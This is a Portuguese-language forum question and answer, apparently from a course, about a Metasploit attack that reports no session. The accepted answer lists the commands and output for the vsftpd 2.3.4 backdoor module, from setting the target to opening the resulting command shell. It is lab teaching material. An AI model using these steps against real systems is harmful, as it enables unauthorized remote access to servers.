Solucionado (ver solução)
Solucionado
(ver solução)
1
resposta

metasploit não abre a sessão

fiz os passos da video aula, o metasploit inicia toda configuração mas não abre a porta, como resolver isso ???

Exploit completed, but no session was created.
1 resposta
solução!

Boa tarde galera, para quem estiver passando por isso eu achei a solução. Algumas vezes a sessão abre automaticamente, outras não irá abrir mas vai deixar um aviso de qual sessão foi aberta para você usar.

o comando abaixo vai procurar pelo exploit desejado

search vsftp

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

o comando abaixo vai trazer informações sobre o exploit

info exploit/unix/ftp/vsftpd_234_backdoor 

Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm <x@hdm.io>
  MC <mc@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the 
  VSFTPD download archive. This backdoor was introduced into the 
  vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
  according to the most recent information available. This backdoor 
  was removed on July 3rd 2011.

References:
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

o comando abaixo vai fazer utilizarmos o exploit

use exploit/unix/ftp/vsftpd_234_backdoor 

o comando abaixo mostra as opções que deveremos configurar no caso RHOSTS

show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic

o comando abaixo configuramos o RHOSTS

set RHOSTS "oipdoalvo"

caso o sua sessão não inicie com o terminal automaticamente lhe informando isso através da mensagem abaixo

Exploit completed, but no session was created.

Fique atento pois logo abaixo ele especifica que sessão você deve abrir

Command shell session 1 opened

Para abrir a sessão usamos o seguinte comando
sessions 1

ps: no meu caso a número 1 estava disponível como aviso no terminal.